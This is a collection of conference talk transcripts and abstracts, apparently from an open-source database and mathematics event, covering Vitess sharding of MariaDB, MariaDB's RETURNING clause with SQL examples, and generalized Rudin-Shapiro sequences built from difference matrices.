migration over here against the schema. The initial database is simply unsharded, and we want to experiment with sharding on it.
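For orientation, the unsharded starting point is a schema along these lines; the exact tables in the Vitess user-guide example differ in detail, so treat the column definitions here as illustrative:

CREATE TABLE product (
  sku         VARBINARY(128) NOT NULL PRIMARY KEY,
  description VARBINARY(128),
  price       BIGINT
);
CREATE TABLE customer (
  customer_id BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY,
  email       VARBINARY(128)
);
CREATE TABLE corder (
  order_id    BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY,
  customer_id BIGINT,
  sku         VARBINARY(128),
  price       BIGINT
);

The plan of the demo is then to move the customer-related tables out of the unsharded commerce keyspace into a new customer keyspace and to shard that keyspace by customer_id.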
Before getting into that, I want to show you what we are running against. We are building this image against MariaDB version 10.3. If I connect to VTGate, which in this case is our proxy for the backend instances, and take a look at the version over here, it's MariaDB, and we are actually connected through the Vitess client session. Then we have some different commands over here that you may not be familiar with. If I say show vitess_tablets, it would give me, for example, the cell, that is the zone; the keyspace, which is the schema, the database; there is no sharding, it's unsharded; and there are the different tablet types. Of course, there's a primary, a replica and a read-only tablet attached to this cluster. There is a little bit of extended information over here, but basically it mimics a primary-replica scenario that you would normally run in your cluster. Let's move forward with the example over here. We have some pre-set scripts over here, which you can find under the vitess.io user guides. There are different examples for both the local install and the operator, and you can run through this scenario to experiment yourself. I want to continue on this one, showing the customer tablets. Basically, in order to get from commerce to customer, we need to initialize a new shard. I will run this and it will create new customer tablets for us so that we can migrate our commerce database, which is unsharded, to a customer keyspace, which will be sharded eventually. It's going to initialize; basically, this is bringing up a set of instances. As the database instances are coming up, we can connect and basically see those tablets coming up. This operation will bring up a new cluster, which is completely configured automatically, in order for us to continue our example. Next up is moving the tables to the new keyspace. As you can see over here from the script, and I don't want to just run it, so it's not hidden, vtctlclient with MoveTables from commerce to customer will actually migrate these over to the new keyspace. I will run this, and it executed already. Next up will be switching reads from the commerce to the customer keyspace. Basically, we're switching reads that are coming into the commerce keyspace over to the replicas that are built for the new customer keyspace. I will run this. Then the traffic switcher, which is our VTGate, which actually knows about all of this via the topo server and keeps track of all this information, can take all the incoming traffic and migrate it into the new space. Now, this is a little bit awkward to visualize; we have a web interface that you can connect to. I don't want to get into that too much because a new VTAdmin UI is coming up very soon, built by our contributors at Slack, and we will be announcing that soon. Let's continue with the example over here. Now that we switched reads, we want to look at switching writes. With this command, vtctlclient SwitchWrites on the commerce-to-customer workflow, we are going to switch the incoming writes as well. Since there's no traffic, things are going to be fast; of course, this is not going to be the case in your environment. We have commerce still in the serving state. Now that we switched, they're both serving, but actually all the reads and writes are going to the customer keyspace. We migrated into customer, but here's what we didn't do: we haven't sharded this keyspace yet. We just prepared the topology to be able to shard.
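A quick sketch of the kind of inspection that goes with these steps, again from a plain MySQL client connected to VTGate; the exact column set of these SHOW commands varies a bit between Vitess versions:

SHOW vitess_tablets;
-- roughly: Cell  | Keyspace | Shard | TabletType | State   | Alias            | Hostname
-- e.g.     zone1 | commerce | 0     | PRIMARY    | SERVING | zone1-0000000100 | ...
--          zone1 | commerce | 0     | REPLICA    | SERVING | zone1-0000000101 | ...
SHOW vitess_shards;   -- lists keyspace/shard pairs, e.g. commerce/0, customer/0

The MoveTables, SwitchReads and SwitchWrites steps themselves are driven through vtctlclient, as in the talk; their exact flags are version-dependent, so follow the user guide that matches your Vitess release.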
We can actually drop the sources for the customer and for the commerce keyspaces and then we can clean up the commerce space. It's going to drop the tablets and drop the tables from the source. Now we want to shard the customer space, and I want to take a look at that real quick; it is going to create a sequence for that. Now we have a concept of sequences, which doesn't really exist in the MySQL/MariaDB world as such, but the sequences are required for the auto increment values. This way, the Vitess topology server and VTGate can control the auto increment values that go into this sharded environment. Now we run this; it will apply the sequences, it will create the VSchema for that, it will apply the sharding scheme and it will create the sharded customer space. If you look at these, you can see these files, which will look like this. It will be creating a customer sequence table, which is going to be of the vitess_sequence category. We will be running the customer sharded environment. Now that we have created the customer sharded environment, it is ready for our sharding. If you look at the VSchema objects that are created, there are going to be two sequences created, one for customer, one for the order. Then there are the VSchema objects created for the sharding scheme: it's on hash, the customer ID on hash. You can change that, and then you have the column and the sequence ID; those are attached to those values so that Vitess knows what the sharding scheme is. For this example, the next step will be creating the new shards that are going to be needed. Let's take a look at that. It's going to create the new shards, these will be the shards, and it will bring up those tablets with this. Then it will initialize the shard masters for the related sharding scheme. It has created those tablets; those are probably coming up. Yes, we can see the new tablets coming up for the sharded customer scheme. Just to reiterate: we had a commerce keyspace that we switched over to customer, and then we started our sharding scheme against the customer keyspace and built a cluster that is going to be sharded for customer. The new shards are created. Now, within the customer space, we need to reshard from the unsharded customer keyspace to a sharded customer keyspace. Okay, run that example over here. We were able to reshard that, and then what we want to do is switch the reads to the new sharded customer space. Okay, and we also want to switch the writes to that customer space via the traffic switcher over here. Okay. All right. Now that we have switched, the primary of the unsharded customer keyspace is no longer serving, and the switch has been made over to the sharded one. Okay. Now we can basically get rid of that unsharded customer space and delete it; we no longer need it. It's going to delete those tablets and free them up. Okay. And that's it. I wish we had more time to play with the data; we don't have too much data to show, and there's also a visual example of this. Again, please visit the vitess.io website under user guides. There are more comprehensive steps and an implementation of this. And again, find me on the Vitess Slack or Twitter or another medium to ask questions, maybe even contribute. Thank you very much for listening.
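As a footnote to the sequences part of the demo: the pattern used by the Vitess user guide is a small backing table in an unsharded keyspace, marked with a special comment, which the VSchema then ties to the sharded table's auto-increment column. A sketch of that shape, with illustrative names and values:

-- in the unsharded keyspace that backs the sequences
CREATE TABLE customer_seq (
  id      INT,
  next_id BIGINT,
  cache   BIGINT,
  PRIMARY KEY (id)
) COMMENT 'vitess_sequence';
INSERT INTO customer_seq (id, next_id, cache) VALUES (0, 1000, 100);

The VSchema entry for the sharded customer table then declares a hash vindex on customer_id and points its auto_increment at customer_seq, which is what lets VTGate hand out globally unique IDs across shards.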
|
In this talk, I'd like to give brief information about how to shard your data under MariaDB topologies and the possibility of using frameworks such as Vitess. While discussing the pros and cons of sharding I would like to showcase how structured horizontal sharding can scale your database almost infinitely. The audience will benefit from how others sharding to scale unlimited under both cloud and Kubernetes realm. In this short talk, I'd like to demo a case study that can be an example to get started for many. Vitess is a database clustering system for horizontal scaling of MySQL through sharding. By enabling shard-routing logic, Vitess allows application code and database queries to remain agnostic to the distribution of data onto multiple shards. With Vitess, you can split, merge, and migrate shards as your needs grow. With its compatibility to development frameworks and integration to open-source tools, Vitess has been a core component of several high traffic OLTP sites around the world and serving data across different platforms. Vitess is also the first Linux Foundation/Cloud Native Computing Foundation graduated open-source database project.
|
10.5446/52854 (DOI)
|
Hi, my name is Rucha Deodhar and I am a junior software engineer at MariaDB Corporation. Today I am going to be speaking about the RETURNING clause in MariaDB. But what is the RETURNING clause? The RETURNING clause is used to return the data for inserted, modified or deleted rows, or alternatively the selected expressions, for these DML statements. Currently, INSERT, REPLACE and DELETE statements support the RETURNING clause. DELETE with RETURNING is supported starting from MariaDB Server 10.0, while INSERT and REPLACE with RETURNING are supported starting from MariaDB Server 10.5. So what expressions can we use with the RETURNING clause? Any expressions that can be calculated can be used. This includes column names, virtual columns, aliases, and expressions which use various operators like bitwise operators, arithmetic operators, logical operators. You can also use functions, say for example control flow functions, string functions and also stored functions. Moreover, you can also use subqueries and prepared statements with this. So let's see why we need the RETURNING clause. RETURNING retrieves the modified, inserted and deleted rows, and without it there would be a need to run a separate SELECT query. This saves a round trip; also, the number of queries running can be important for the performance of your applications. So you are running a smaller number of queries and getting the same job done. Sometimes you may want to trigger actions in an application based on what gets inserted, deleted or modified. Along with this, there can be scenarios where data is generated and is not explicitly inserted into the table, for example in the case of auto increment and default values. In such situations you may want to retrieve the data to trigger things in your application based on what data gets generated. You can use INSERT IGNORE to find out what data got inserted into the table. You can use INSERT ... ON DUPLICATE KEY UPDATE to find out what got updated when you inserted data into the table, and trigger actions in your application based on that. So let's find out how to use it by taking some examples. Here we have a customers table. Suppose there is a bank and they want to find out if their new customers are eligible for a loan based on their credit scores. For this customers table we have auto increment and default field values, along with other fields for which data is auto generated. So now when we use the INSERT statement and we want to find out if the customer is eligible for a loan at the time of inserting the data, then we can use the RETURNING clause, and here I have used the customer ID and another SELECT statement as the select expressions for the RETURNING clause. This is the output we get: customer ID and decision as columns of the output. Similarly, here is another example where I have only used column names as the select expressions in the RETURNING clause. You can also use the RETURNING clause with a REPLACE statement for conditional insert, as shown in the example. You can also use the RETURNING clause with a DELETE statement. Say, for example, you want to delete all the records of customers whose credit score is less than 700 and you want to move them to another table; in that case you can use DELETE with the RETURNING clause. Here is an example for that. I have used the customer ID and another SELECT statement as the select expressions for the RETURNING clause, and the output is as shown. And that brings me to the end of my presentation. Thank you. I hope you liked it.
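The examples described can be sketched as follows; the table layout, names and the eligibility rule are illustrative rather than the ones on the slides:

CREATE TABLE customers (
  customer_id  INT AUTO_INCREMENT PRIMARY KEY,
  name         VARCHAR(100),
  credit_score INT,
  created_at   TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);

-- INSERT ... RETURNING (MariaDB 10.5+): read back the generated id,
-- the defaulted timestamp and a computed loan decision in one round trip
INSERT INTO customers (name, credit_score)
VALUES ('Asha', 745)
RETURNING customer_id, created_at,
          IF(credit_score >= 700, 'eligible', 'not eligible') AS decision;

-- DELETE ... RETURNING (MariaDB 10.0+): see exactly which rows were removed,
-- e.g. so the application can archive them elsewhere
DELETE FROM customers
WHERE credit_score < 700
RETURNING customer_id, name, credit_score;

REPLACE ... RETURNING works the same way from MariaDB 10.5 on.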
|
RETURNING retrieves the modified, inserted or deleted values of columns. Without RETURNING, there would be a need to run an extra SELECT query.So, along with many other benefits like triggering actions in your application based on what really gets modified, it helps to avoid a round trip and still gets the same job done! Number of queries running can be important for performance of your application as well. So you can have your cake and eat it too!
|
10.5446/53712 (DOI)
|
So first of all, thank you very much to the organizers for giving me this opportunity to present recent and not so recent work by myself and my co-authors. Also thank you to the technical staff at CIRM; it is not an easy task to organize such an online event. So we talk about generalized Rudin-Shapiro sequences; quite a few generalizations are already available, and I will add a new one, which I find interesting and which is motivated by a certain property about correlations. The Rudin-Shapiro sequence is a purely deterministic sequence, but it has quite some interesting randomness properties, and I use one pseudorandomness property to generalize this Rudin-Shapiro sequence. This talk is based on joint work with Irène Marcovici, my colleague from Nancy, from next door basically, at the Institut Élie Cartan, and our PhD student Pierre-Adrien Tahay, who will have his PhD defense in three weeks or so. And yes, the outline of this talk is as follows. There is a fairly long historical introduction about the Rudin-Shapiro sequence, and I want to give quite a few references where this Rudin-Shapiro sequence appears and has been generalized and put in context. I will then talk about small scale and large scale correlations. This is the property that I want to take up; it is a property that has been proven by Mauduit and Sárközy in 1998. And I give some results that I obtained about 10 years ago with Jeffrey Shallit and Elliot Grant, where we could basically generalize these results to prime alphabets. So the Rudin-Shapiro sequence is a sequence on two letters, and we could generalize this property and recover it for generalizations on prime and squarefree alphabets, but we could not get to the remaining composite numbers; this is the work that has been done by Pierre-Adrien in his PhD thesis, based on difference matrices. I will then talk about these correlations on general alphabets, large scale and small scale, where we can get the error term that we originally wanted. And I will finish with some higher dimensional generalizations that have already been studied in some contexts, also in physics. Okay, so I start off with the original problem. Given a sequence A on two symbols, say minus one and plus one, you may ask what is the size of S_N(A), which is the supremum norm of this polynomial of degree N on the unit circle, and you might ask how large or how small this quantity can be for deterministic sequences. From Parseval, you directly get that the quadratic norm equals the square root of N, and if you take the supremum norm, you get the lower bound of square root N, and the trivial bound is capital N. So the problem is how close you can get to square root of N. And there is a result which goes back to Salem and Zygmund from the 50s, which proved that for almost all A, in the sense of measure, you are close to square root N up to a factor of square root of log N. So there might be some possibility to get to square root N, and the Rudin-Shapiro sequence is one of the sequences that gets very close. So the problem is to construct a deterministic sequence that has this root N property. Shapiro's approach was the following. He started off with an interrelated recursion of two polynomial sequences, P and Q, and there is a factor of z to the power 2 to the n in front of the Q's. You may also think about the matrix that is in front of this (P, Q) vector.
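In symbols, the interrelated recursion just mentioned is usually written as follows, with the standard normalisation:

\[
P_0(z)=Q_0(z)=1,\qquad
\begin{pmatrix}P_{n+1}(z)\\ Q_{n+1}(z)\end{pmatrix}
=\begin{pmatrix}1 & z^{2^n}\\ 1 & -z^{2^n}\end{pmatrix}
\begin{pmatrix}P_n(z)\\ Q_n(z)\end{pmatrix},
\]

so that $P_n$ and $Q_n$ are polynomials of degree $2^n-1$ with all coefficients equal to $\pm 1$.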
This is the starting point of the generalizations afterwards by several people. And he used a parallelogram rule, a very simple fact about complex numbers, so that in passing from degree 2 to the n to degree 2 to the n plus 1 you only pick up, in the squared sense, an additional factor of 2. So by induction, you can prove that the modulus of this polynomial on the unit circle is bounded by a constant times the square root of 2 to the n, and so you basically get the square root saving in terms of the degree of the polynomial. Starting from this construction, you can define a sequence; this is how Shapiro actually started off. You can show that, passing from n to n plus 1, the polynomial has the same first coefficients, so the first coefficients stay stable and will not change. And so you can let n tend to infinity and you get what is called the Rudin-Shapiro sequence, or, if you truncate, the Rudin-Shapiro polynomials. And he proved that the supremum norm of this polynomial on the unit circle is bounded by a constant times the square root of the degree of the polynomial. So there are three names related to the sequence, and maybe history did not respect the correct way to name it. There had been a paper by Golay in optics and spectrometry where he already used this kind of construction; he spoke about these pairs of complementary sequences. When you look at consecutive ones in a digital expansion, this is very, very close to the original definition of the Rudin-Shapiro sequence. And as many of you know, Shapiro wrote this in his thesis, and Rudin knew of this work; this is how the Rudin-Shapiro sequence got its name. There are several people who try to give the sequence a new name: there is Golay-Shapiro, there is Golay-Rudin-Shapiro. So I just want to mention this historical fact, that maybe it is not undisputed how to name the sequence. I will stick for this talk to Rudin-Shapiro, but I still wanted to give this mention. So this square root N property is not specific to the Rudin-Shapiro sequence. There are several other sequences that have this property, and one of these is the paper folding sequence. This is: if you take a sheet of paper and you fold it, and do this in an infinite way, you can count the right and the left turns and you get a binary sequence, a sequence that also has the square root N property. There have been many, many works about the square root N property and on these Rudin-Shapiro polynomials. I just mention a few; this is maybe far from being exhaustive, but I would be happy if you pointed me to more related work. So, Allouche and Mendès France, and this list is ordered alphabetically, not by year: Allouche and Mendès France showed some bounds for an exponential sum that uses this Rudin-Shapiro sequence. Allouche and Liardet had a generalization of Rudin-Shapiro; I will talk about this a bit later. There is a recent result on the arXiv proving the best constant in front of the square root N. Before this we had two plus square root two; there was a longstanding question whether you can replace this by square root six, which should be optimal, and this has now been proved, though the history is a bit involved, and Saffari already had kind of a constant here. So basically the square root N problem has been solved. I just mention a few other names related to this work.
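Going back to the parallelogram rule mentioned at the start of this passage: it is just the identity, for $|z|=1$,

\[
|P_{n+1}(z)|^{2}+|Q_{n+1}(z)|^{2}
=\bigl|P_n(z)+z^{2^n}Q_n(z)\bigr|^{2}+\bigl|P_n(z)-z^{2^n}Q_n(z)\bigr|^{2}
=2\bigl(|P_n(z)|^{2}+|Q_n(z)|^{2}\bigr),
\]

so by induction $|P_n(z)|^{2}+|Q_n(z)|^{2}=2^{\,n+1}$ on the unit circle, and in particular

\[
\|P_n\|_{\infty}\;\le\;\sqrt{2}\cdot 2^{n/2},
\]

which is exactly the square-root saving in the degree described above.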
So Brillhart and Morton showed some results about the summatory function of the Rudin-Shapiro sequence. And Brillhart and Carlitz is, as far as I know, the first place where this Rudin-Shapiro sequence has been defined in an equivalent way, by counting blocks of two consecutive ones in the binary expansion; this is in the 70s. Doche, around 2004, provides a new method to attack moments of the Rudin-Shapiro polynomials. Mauduit and Rivat show distribution results for the Rudin-Shapiro sequence along primes and squares. Mendès France and Tenenbaum in the 80s showed a general framework where the Rudin-Shapiro sequence and the paper folding sequence are specific particular cases, and managed to show similar results for a general family. Montgomery had a conjecture about a part, a sub-polynomial so to say, of the Rudin-Shapiro polynomial, and about some bounds for it, and this conjecture has been disproved. Queffélec, who is also here, obtained a very general framework for substitution dynamical systems in which the Rudin-Shapiro sequence is also a special case. Rodgers proved recently a result about the distribution of the values of the Rudin-Shapiro polynomials, suitably normalized, in the unit disk; there's a recent paper. And Saffari had several results on this question and about this constant in front of the square root N property. So the recursion that you get from this Shapiro construction is very simple. It comes directly out of this, and you can have an interpretation which basically goes back to, the first time it appears as far as I know, Brillhart and Carlitz, where they look at this Rudin-Shapiro sequence r(n) as minus one to the count of the possibly overlapping blocks one-one in the base two expansion of n. We already heard this in the talk of Michael Drmota. Let me just mention maybe one example. If you take 187 here and you expand it in base two and you count the number of blocks of two consecutive ones, then you have here one block, there is another overlapping one, so two, and here is three. So you count this as three, you take minus one to the three, and the value is minus one. You can show that this is exactly what the recursion means in the base two expansion. So what I want to talk about today is this property here, which has been proven by Mauduit and Sárközy as part of their program to study several deterministic sequences with regard to pseudorandomness measures. It was known for quite a while, and it follows basically from the spectral analysis of a special class of substitution dynamical systems, that the correlation measure of this Rudin-Shapiro sequence is the Lebesgue measure, so basically you know that this sum is a little o of capital N if D is fixed. What they could show is that the correlation is really, really small. So basically this is a sum of minus ones and ones, you have lots of cancellations, and the error term, the distance from zero, from the mean, is not square root N, it's of order log N. So it's quite a natural question whether you can, even in their setting, let D grow as a function of capital N and still have this non-correlation. So this is one of the results; this is what I mean by large scale correlation: the D can still be very large and you still have non-correlation of these terms.
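In formulas, the block-counting definition and the correlation in question read as follows, with $\varepsilon_i(n)$ the binary digits of $n$:

\[
r(n)=(-1)^{e_{11}(n)},\qquad
e_{11}(n)=\#\{\,i\ge 0:\ \varepsilon_i(n)=\varepsilon_{i+1}(n)=1\,\},\qquad
n=\sum_{i\ge 0}\varepsilon_i(n)\,2^{i}.
\]

For the example in the talk, $187=(10111011)_2$ contains three overlapping blocks $11$, so $r(187)=(-1)^3=-1$. The correlation referred to is

\[
\sum_{n\le N} r(n)\,r(n+D),
\]

which for fixed $D\ge 1$ is not merely $o(N)$ but, by the quoted result, of size $O(\log N)$; the "large scale" question is how fast $D$ may grow with $N$ while this cancellation persists.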
So the question that we asked, and started to deal with some years ago, is to find a combinatorial extension to general alphabets in order to regain some kind of correlation result of this type, meaning that we can still have D growing as a function of capital N and still have non-correlation of these terms; so, to have the largest possible growth of D as a function of capital N while still having these non-correlation properties. On generalizations, there are quite a few out there. I mention maybe a paper by Allouche and Bousquet-Mélou from the 90s, where they started to investigate the factor complexity of the generalizations found by Mendès France and Tenenbaum, and they could show basically that the factor complexity, that is, the number of factors of length L in these generalizations, is linear, which also follows from a much more general fact about automatic sequences, but they could give an explicit value. So this is one of these combinatorial interpretations. Rider was, as far as I know, the first to look at a generalization of the Rudin-Shapiro sequence where this matrix, which is associated to these interrelated polynomial recurrences, is replaced by a general matrix related to roots of unity, and this point of view has been taken up by Martine Queffélec in her paper and also in her monograph. And Allouche and Liardet presented yet another generalization that doesn't look at consecutive ones in the binary expansion: you fix a size, let's say K, and you fix a pair a and b, and you count the number of blocks consisting of a, then an arbitrary block of size K, then b. So you are moving "a, a block of size K, b" through the digits of the digital expansion and you count the number of occurrences of this kind; these are related to chained sequences and chained functions, which gives an even more general context for these Rudin-Shapiro sequences, and which has been used by Mauduit and Rivat in their paper as well. Okay, so what we actually wanted to do is to find some results about how often we can avoid equal terms. This is a very general definition. We say that we have an infinite sequence over a k-letter alphabet, and we fix an integer vector with m components, and we run with this fixed integer vector through the sequence, and we give it a value of zero if we see the same symbol at each entry, and one otherwise. So this is some way of saying that the members, the elements of the sequence, are not correlated if at least one of these elements is different from the others. And so in 2009 we could show that it is not possible to do better than a random sequence in terms of this correlation, which is not very surprising, but it took a bit of a combinatorial inclusion-exclusion argument to get there. So if you fix a D and let N run to infinity and you want to maximize this quantity, and maximizing means that two terms should be different, then you cannot do better, for all of the D's, than the random case, which means that the lim inf, as D grows to infinity, stays small in these terms. And the surprising part is that for Rudin-Shapiro you basically hit the bound; you can actually get exactly to the bound. And one application, basically one motivation, was to construct sequences on a k-letter alphabet that hit this bound, and these were our generalizations of the Rudin-Shapiro sequence.
I just mentioned one related result in that context so if you fix a d to a vector of m components and you run again through your sequence then you cannot always do better than the random case in terms of if the norm of the d gross then this limit is small and in that case Rudin Shapiro is not optimal if m is larger than 2. So it has been shown by Moduy and Jacques Hussis that if you take four terms in Rudin Shapiro then four terms in Rudin Shapiro are highly correlated so basically it's not possible to get this little o of capital N if you choose your d, your window or your distances between their terms in an according way. So what was our definition and I will then give a general context via difference matrices. What we need actually to prove is non correlation estimates we use exponential sums we use exponential sums and in doing so we need it in fact a function f that if you look at the differences matrices and reduce Modulo k permutes all of the elements of the alphabet so 0 up to k minus 1 and this function is periodic and there are several examples that give some generalizations that I mentioned before that can be coded by correct or not appropriate choice of this function f and a generalized Rudin Shapiro sequences is there is then a function where you have this kind of recurrence relation so what you do is you take an entry so you write it in base k you split off the last digit which I call j and then I have n k plus j and the Rudin Shapiro the count is the count of n plus the function that takes into consideration just the last digit and the n that is in front with a fixed f and f is a function that is periodic in the second variable. So this generalizes the class of generalized Rudin Shapiro sequences that has been suggested proposed by Martin Kefelig where you replace in the original Rudin Shapiro sequence the minus 1 by case root of unity and in the exponent you add the product of consecutive digits and in the case when case prime you can prove that this function is differences permute in the correct way and therefore rise to generalize Rudin Shapiro sequence in our sense. In the specific case when k equals 2 we get this generalized original Rudin Shapiro sequence of the alphabet 01. There are some quite interesting other examples I just mentioned here you can count other blocks of size 2 1 0 0 0 1 0 1 etc with this type of this definition. Another when you count you give the total count of the number of sub blocks 0 0 1 1 and 2 2 in the ternary expansion of integers. So what are the result that we got we could generalize this result by Mudri and Shakruzi directly when case prime with the help of this definition we still get if the distance of the two elements so let's say that the one is less than d2 if this distance is a little over capital N we still get an asymptotic formula and the error term is very small and we tried to use this construction to glue various primes together to get at least k square 3 and this was actually the extension that we proposed at that stage. 
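Spelled out, the recurrence and the special case with k-th roots of unity described above read roughly as follows; the exact placement of the arguments of $f$ follows my reading of the description rather than the slides:

\[
u(kn+j)\;=\;u(n)+f(n,j)\qquad(0\le j<k),
\]

where $f$ is periodic, so that effectively only the last digit of $n$ and the split-off digit $j$ enter; and the generalisation attributed to Queffélec corresponds to

\[
u(n)\;=\;\sum_{i\ge 0}\varepsilon_i(n)\,\varepsilon_{i+1}(n)\ (\mathrm{mod}\ k),
\qquad
n=\sum_{i\ge 0}\varepsilon_i(n)\,k^{i},
\]

with associated sequence $n\mapsto e^{2\pi i\,u(n)/k}$; for $k=2$ this recovers the classical Rudin-Shapiro sequence.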
We use several generalized Rudin Shapiro sequences and use some kind of a contour and a memorization construction to glue them together and to define a generalized Rudin Shapiro sequence to k over an alphabet which is square 3 and we got a result of that type where we still get the correct main term but the error term is well is is is worse and this comes of the fact that we use a procedure outlined or used by King about the sum of digits in different bases and we have to take into consideration some carry propagation and we have to cut it down and we lose quite quite some bit there. So but we had no idea how to get to to to composite composite values of k how to what is the correct combinatorial interpretation or by a recursions to get to these non square 3 fix. So this is where the differences matrices come in. This is a concept that we found out and was also worked out by Pierre-Adrien. This is thesis. You take an alphabet of size k so there is no arithmetic condition on k now. G should be a finite a billion group. This could be the residue small of the k but there are other possibilities as well. And then there's a notion that is called a block additive function. This is very well known goes back to at least a manual people and who called his digital functions. So what is what it does is you run you write and in base k you take consecutive integers and then for each pair of digits you give it a weight and you have therefore a weight function. Of course if you take who didn't appear as block additive if the function f gives a 1 if you have 1 1 and in other cases it gives 0 as a value. Block additive functions are automatic sequences are k automatic. And Javier is one of them. So what is interesting about this block additive functions what we need it actually in our proofs is that we need that everything that we get the whole permutation of our original alphabet. And if you take here a group G and we fix an element little g. Then what we want is for each i and j that we fix and if we run through the whole alphabet all of the differences should be taken the same number of times. So this should be independent of the g. So in other terms we need a key distribution in some sense in terms of differences on the group. And this can be written in the sense of differences, differences matrices, differences matrixes, matrixes matrixes of r rows and c columns. When you take any choice of two rows and you do the differences of these two rows then you hit every element of the group just the same number of times. So give maybe a couple of examples. So here this is the original Rudin-Shapeo sequence. If you look at the second row and you subtract the first row and of course you get the zero here and the one here so which is the whole z2 so the rest is just modulo2. If you take this one for instance and take the third row and you subtract the second row you get the zero, you get the one, you get minus one which is two modulo3 and so you hit all of the terms of the group. This can be proven also that this is the case here and also here and this goes back to this construction that we had before for primes. This is a highly non-trivial area and maybe these differences matrices are not that well known but they are quite related to these Hadamar matrices and its Hadamar matrix is a square matrix where you basically put ask for all of the rows should be orthogonal one to the other. So for any choice of two rows you have a non-tagonality relation and all of the entries are just plus ones and minus ones. 
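The block-additive functions and the difference condition just described can be written out as follows, under the stated assumptions (weights in a finite abelian group $G$, digits $\varepsilon_i(n)$ in base $k$; which index of $F$ plays the role of the row is my choice of convention):

\[
a(n)\;=\;\sum_{i\ge 0}F\bigl(\varepsilon_{i+1}(n),\varepsilon_i(n)\bigr)\ \in G,
\qquad
n=\sum_{i\ge 0}\varepsilon_i(n)\,k^{i},
\]

with Rudin-Shapiro the case $k=2$, $G=\mathbb{Z}/2\mathbb{Z}$, $F(1,1)=1$ and $F=0$ otherwise. The difference-matrix condition asks that for all $i\ne j$ and every $g\in G$ the count

\[
\#\bigl\{\,c\in\{0,\dots,k-1\}:\ F(i,c)-F(j,c)=g\,\bigr\}
\]

is the same for every $g$, i.e. the differences of any two rows of the matrix $\bigl(F(i,c)\bigr)_{i,c}$ hit each group element equally often.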
At these Hadamar matrices there is a conjecture about the existence of Hadamar matrices going back to 1893 to Hadamar who asked whether it is possible, whether does there exist for any multiple of four as a dimension of the matrix, does there exist a Hadamar matrix? This is still open and for instance the last result in that perspective is a couple of lists of go and the best result known is now that up to 664 there is always a Hadamar matrix but nobody knows whether there exists a Hadamar matrix of size 668. So this is still open and you can show that different matrices and Hadamar matrices are somehow related. Basically you can show that the Hadamar matrix of size n exists if and only if there exists a matrix, a different matrix of size n over the group Z2, so over 0, 1. This is basically equivalent. So just to mention that this is quite a difficult problem in combinatorial designs and maybe the first paper goes back to Juniko who studied several cases. The most comprehensive monograph about these kind of combinatorial matrices is maybe Hidayat, Slovan and Stufken about orthogonal arrays and there is still quite ongoing work about the classification of these different matrices, for instance the PhD thesis of Lampio from Helsinki a couple of years ago where he tried actually to give a computational approach also to calculate or to find all of the different matrices possible of a fixed dimension. And I just mentioned maybe you can show that for certain integers the set of all differences matrices is empty and basically this was the fact that we could not find to get it to dimension 4, 4 is composite. But if there exists, if you change the underlying group there exists a difference matrix. So Hidayat and basically there exists these different matrices whenever you find a good group. So there is a result that appears in that book of Hidayat about these orthogonal arrays which goes the way that whenever your dimension of the matrix is a power of a prime then there exists a billion group such that the set is non-empty. So you can give basically a difference matrix whenever the size of the matrix is a power of a prime. The construction uses finite fields. Basically what you do is you write down your large columnomial, you cut it down somewhere and you use the multiplication table of the large field to construct this table with a binding. So this is a construction but maybe here's an example, for D99 so South 99 of the group Z3 there are two different classes so they're completely different types of different matrices. So equivalence clause I won't go into details, equivalence clause means that you can normalize in some sense your matrix that they are ordered in rows and columns, like we do graphically. And it's quite strange that you can change a little corner inside this matrix and matrix until you still get the difference matrix. And so Lampe did quite a few calculations about these classes. And here I just mentioned maybe another one where you see that the first five rows stay the same and here the next four are completely different from the first class. And he could show that here there are five equivalence classes of these matrices. Okay, so I mentioned quite rapidly the result by Pierre Adrien that he had. He used these difference matrices to get the Modry-Chacuzzi correlation result when the size of the matrix is a power of prime where we know that there is a difference matrix. 
And so this solves actually the problem of the size four alphabet where he needed actually to change the group, the underlying group. And therefore could construct Rudin-Chapiro sequence on the alphabet 0, 1, 2, 3. So on really four letters, all of the four letters are used to get this correlation result. And with gluing together he could go up to composite alphabet size and losing again in the error term by a procedure that is known back in. Okay, so the question that we asked in, and maybe in the last minutes I will show us six minutes. I will show how to, what was our motivation. Let's, if you fix D, is it possible basically to show that for any kind of generalized Rudin-Chapiro sequences, sequence that is based on this difference matrix, we get as good as in the original case, which means that the error term is of the size of log n. And yeah, so the question was then or is still ongoing, we do not know whether it's possible to let D grow as a function of capital n to still get this one. But this was already the challenge to find the conditions on our, whether are there any conditions on this function to get this bound. And so what this generalizes is this discrete correlation coefficient that I gave before, because this coefficient only takes care whether symbols are equal or not. Here we fix i and j and we look how often we hit i and j basically asymptotic, in an asymptotic sense. And if you look here at the generalized Rudin-Chapiro with p because three that we have, and you run basically through the sequence with a distance of one, two, three, four symbols, you get a zero, one, etc. And you might see that yeah, all of these couples, all of these pairs appear and the correct way with a very small error term. This is what we got empirically. And this happens for any choice of the underlying difference matrix. Maybe I go a bit further. Okay, so the, we got that result. Just mentioned quickly how, what was the proof idea. What we actually need is to study differences in these block additive functions based on this digital expansions. And what we do is we write n and n plus t in base k. So from left to right in the unusual way. So this is the lowest significant digits and going up to the highest significant digits. And we stop at the, to see n is the digit, the last digit where these expansions differ. So meaning that from starting from here, there is no carry that goes over to the largest digits. And to define some kind of a fiber, fiber of n. And this fiber takes care of the digit that is next to this CN index CN. And what we do next is to decompose our interval. So our, we look first of these elements of the fiber and let's I, so we take n, we look at the digital expansion and we put an I on the, on the higher placed digit next to the last digit that is affected by the addition of t. And when you now go to this generalized through in Shapiro sequence based on this block additive function, then we can write it like this, where C1 is a function that only lives on the lower placed digits and C2 is a function or a constant in that case that lives on the lower placed digits. When you now go to the difference and this is exactly what we want first in the first step, then we get the constant here and the upper part just goes away because is not the fact that the addition of the addition of n. What we now do is I change a run from zero up to K minus one to the whole alphabet. 
